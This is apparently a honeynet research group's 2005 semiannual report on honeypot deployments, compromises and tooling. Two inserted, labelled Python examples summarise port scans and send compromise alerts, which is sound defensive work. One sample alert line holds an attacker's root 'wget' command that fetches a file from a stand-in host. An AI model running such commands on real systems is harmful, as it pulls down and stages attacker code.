Report:October-2005

From Honeynet-PT


DEPLOYMENTS

Current technologies deployed.

During the last six months we ran one Gen III honeypot farm, using HoneyMole to transport all the network traffic from the remote locations to our farm. HoneyMole is the tool we presented as a prototype in our last report under the name Kangaroo.

Our honeypots ran Linux, Windows XP, Solaris 10 (SPARC) and OpenSolaris, all configured as servers and hosted at four different ISPs and companies.

MWcollect was also deployed, to start gathering statistics on malware activity across the different ISP networks.


Lessons learned from the technology, what we like about it.

Roo is an excellent toolkit, very handy and useful.

HoneyMole has proved to be a stable, reliable and flexible tool for transporting all the network traffic transparently and securely to the honeypot farm.

Honeypot farms are an extremely powerful and useful technology for gathering data from different origins, and we have found them very easy to configure and manage with the tools available from the Honeynet Project.


Lessons learned from the technology, what is lacking, what we would like to see improved.

A better MySQL schema for Sebek data, to speed up SQL queries and make it more suitable for collecting data from honeypot farm deployments.


FINDINGS

Number and type of systems compromised during six month period.

Three systems were compromised: one Linux and two Windows.


Highlight any unique findings, attacks, tools, or methods.

For the first time, two of the systems were attacked from other Portuguese IP addresses. All of the attacks used known methods, so there is nothing new to report.


Any trends seen in the past six months.

A lot of activity on the Windows XP systems, on UDP ports 1028, 1029 and 1030. Scanning of TCP port 22 (SSH) also increased on all systems.
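The port trend above is the kind of summary we pull out of the farm's connection logs. The script below is an added example (not code from the Honeynet-PT chapter or from Roo) showing how to derive it: it parses a simplified one-flow-per-line log format that is an assumption of this example, counts hits and distinct sources per protocol/port, and picks out sources that touched several honeypots on one port, which is what a scan looks like from the farm's side. The log lines in SAMPLE_LOG are constructed, using documentation address ranges, not captured data.

```python
"""Summarise per-port activity from honeypot connection logs.

Added example, not part of the original Honeynet-PT report. The input
format "<epoch> <proto> <src>:<sport> -> <dst>:<dport>" is an assumption
of this example; adapt parse_flows() to whatever your sensor emits.
"""
from collections import defaultdict
import re

FLOW_RE = re.compile(
    r"^(?P<ts>\d+)\s+(?P<proto>tcp|udp)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def parse_flows(lines):
    """Parse flow lines into dicts; malformed lines are skipped, not fatal."""
    flows = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = FLOW_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        flows.append({
            "ts": int(d["ts"]), "proto": d["proto"],
            "src": d["src"], "sport": int(d["sport"]),
            "dst": d["dst"], "dport": int(d["dport"]),
        })
    return flows


def port_summary(flows):
    """Return {(proto, dport): {"hits": n, "sources": set, "targets": set}}."""
    summary = {}
    for f in flows:
        key = (f["proto"], f["dport"])
        entry = summary.setdefault(key, {"hits": 0, "sources": set(), "targets": set()})
        entry["hits"] += 1
        entry["sources"].add(f["src"])
        entry["targets"].add(f["dst"])
    return summary


def top_ports(summary, n=5):
    """Most-hit (proto, port) pairs, busiest first."""
    return sorted(summary.items(), key=lambda kv: kv[1]["hits"], reverse=True)[:n]


def scanning_sources(flows, proto, dport, min_targets=2):
    """Sources that hit at least min_targets distinct honeypots on proto/dport."""
    targets = defaultdict(set)
    for f in flows:
        if f["proto"] == proto and f["dport"] == dport:
            targets[f["src"]].add(f["dst"])
    return {src: len(t) for src, t in targets.items() if len(t) >= min_targets}


# Constructed sample (documentation address ranges), not real honeynet data.
SAMPLE_LOG = """\
# constructed sample, not real data
1128000001 udp 203.0.113.5:4821 -> 192.0.2.10:1028
1128000002 udp 203.0.113.5:4822 -> 192.0.2.10:1029
1128000003 udp 203.0.113.5:4823 -> 192.0.2.10:1030
1128000004 udp 198.51.100.7:3310 -> 192.0.2.11:1026
1128000010 tcp 198.51.100.9:51000 -> 192.0.2.10:22
1128000011 tcp 198.51.100.9:51001 -> 192.0.2.11:22
1128000012 tcp 198.51.100.9:51002 -> 192.0.2.12:22
1128000013 tcp 198.51.100.9:51003 -> 192.0.2.13:22
1128000020 tcp 203.0.113.40:40000 -> 192.0.2.12:22
1128000030 tcp 203.0.113.41:40100 -> 192.0.2.10:80
"""


def summarise(text=SAMPLE_LOG):
    """Top ports (with hit and distinct-source counts) plus SSH scanners."""
    flows = parse_flows(text.splitlines())
    summary = port_summary(flows)
    return {
        "top": [(k, v["hits"], len(v["sources"])) for k, v in top_ports(summary)],
        "ssh_scanners": scanning_sources(flows, "tcp", 22),
    }


if __name__ == "__main__":
    r = summarise()
    for (proto, port), hits, nsrc in r["top"]:
        print(f"{proto}/{port}: {hits} hits from {nsrc} sources")
    for src, n in r["ssh_scanners"].items():
        print(f"ssh scan: {src} hit {n} honeypots")
```

Counting distinct sources per port, not just hits, is what separates one noisy host from a trend; the per-source target count is what separates a scan from a single targeted connection.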


Document data analysis tools and methods being used.

Walleye is very useful for following the attackers' steps. Ethereal is still the best tool for network traffic analysis. We also use scripts that send SMS alerts whenever a compromise succeeds.
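The SMS alerting mentioned above is simple to script; the hard parts are deciding what counts as a compromise and not paging yourself on every probe. The following is an added example (not the chapter's own script) that does both: on a honeypot, inbound connections are expected noise, while an outbound connection initiated by the honeypot or interactive keystrokes captured by Sebek mean the box is being driven by someone, so only those events page. Alerts are throttled to one message per honeypot per cooldown window, and messages are cut to the 160-character SMS limit. The alert line format "<epoch> <honeypot_ip> <event> <detail>", the event names and the sample lines are constructed assumptions of this example; the send callback stands in for whatever SMS gateway or email-to-SMS path a deployment actually uses.

```python
"""Turn honeynet alert records into throttled SMS-style notifications.

Added example, not code from the Honeynet-PT chapter. The alert format
"<epoch> <honeypot_ip> <event> <detail>" and the event names are assumed;
the send callback is where a real SMS gateway would be called.
"""
from collections import namedtuple

Alert = namedtuple("Alert", "ts host event detail")

# Events that mean the honeypot itself is acting: a honeypot initiating
# connections or someone typing on it is a compromise, inbound probes are not.
COMPROMISE_EVENTS = {"OUTBOUND_CONNECTION", "SEBEK_KEYSTROKES"}
SMS_MAX_LEN = 160


def parse_alert(line):
    """Parse one alert line; returns None for malformed input."""
    parts = line.strip().split(None, 3)
    if len(parts) < 4 or not parts[0].isdigit():
        return None
    return Alert(int(parts[0]), parts[1], parts[2], parts[3])


def is_compromise(alert):
    return alert.event in COMPROMISE_EVENTS


def format_sms(alert):
    """Build the message text, truncated to fit a single SMS."""
    text = f"HONEYPOT {alert.host} compromised: {alert.event} {alert.detail} @{alert.ts}"
    return text if len(text) <= SMS_MAX_LEN else text[:SMS_MAX_LEN - 3] + "..."


class Notifier:
    """Send at most one SMS per honeypot per cooldown window (seconds)."""

    def __init__(self, send, cooldown=3600):
        self.send = send          # callable taking the message text
        self.cooldown = cooldown
        self.last_sent = {}       # host -> epoch of last SMS for that host

    def process(self, lines):
        """Feed alert lines; returns the list of messages actually sent."""
        sent = []
        for line in lines:
            a = parse_alert(line)
            if a is None or not is_compromise(a):
                continue
            last = self.last_sent.get(a.host)
            if last is not None and a.ts - last < self.cooldown:
                continue      # already paged for this host recently
            msg = format_sms(a)
            self.send(msg)
            self.last_sent[a.host] = a.ts
            sent.append(msg)
        return sent


# Constructed sample alerts (documentation address ranges), not real data.
SAMPLE_ALERTS = """\
1128000000 192.0.2.10 INBOUND_CONNECTION 203.0.113.5:4821->1028/udp
1128000300 192.0.2.10 OUTBOUND_CONNECTION 192.0.2.10->198.51.100.7:6667/tcp
1128000320 192.0.2.10 SEBEK_KEYSTROKES uid=0 cmd="wget http://198.51.100.7/x"
1128000900 192.0.2.11 INBOUND_CONNECTION 198.51.100.9:51000->22/tcp
1128004000 192.0.2.10 OUTBOUND_CONNECTION 192.0.2.10->198.51.100.8:25/tcp
"""


def run_sample():
    """Run the sample through a Notifier whose 'gateway' is a plain list."""
    outbox = []
    notifier = Notifier(outbox.append)
    notifier.process(SAMPLE_ALERTS.splitlines())
    return outbox


if __name__ == "__main__":
    for msg in run_sample():
        print(msg)
```

On the sample, the first outbound connection from 192.0.2.10 pages, the keystrokes twenty seconds later are suppressed by the cooldown, the inbound SSH probe against 192.0.2.11 is ignored, and the outbound connection just over an hour later pages again.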


For data analysis what tools work well, and what still needs to be developed.

Roo is very nice but still needs some stability improvements.


MISC ACTIVITIES

Presenting at conferences.

We gave a presentation at SANS Institute in Portugal and another at the 5th OpenBSD .PT Meeting.


Developing, testing or releasing code.

HoneyMole, our transparent tunnelling tool. It needs no kernel patch or module to work.


Publication of papers.

We have submitted a paper to the SINO 2005 conference (1st National Security Conference).


Involvement in SotM challenges.

None.


Other.

None.


ORGANIZATIONAL

Changes in the structure of your organization.

None.


LESSONS LEARNED

What positive things can you share with the community, so they can replicate your success.

We have started using Trac (http://projects.edgewall.com/trac/) internally for code development; it is very easy to use and efficient. We cannot live without HoneyMole when working with honeypot farms: it makes tunnelling all the traffic to a central repository very easy.

What mistakes can you share with the community, so they don't make the same mistakes.

None.


FUTURE GOALS

Plans/Goals for next six months.

We will continue developing HoneyMole and investigating honeypot farm technology, looking for new approaches.

Now that HoneyMole is stable, we plan to use it to deploy darknet architectures or to simulate enterprise intranets.

We are also considering deploying honeypots running Asterisk, as we are hearing rumours of attacks in that area.
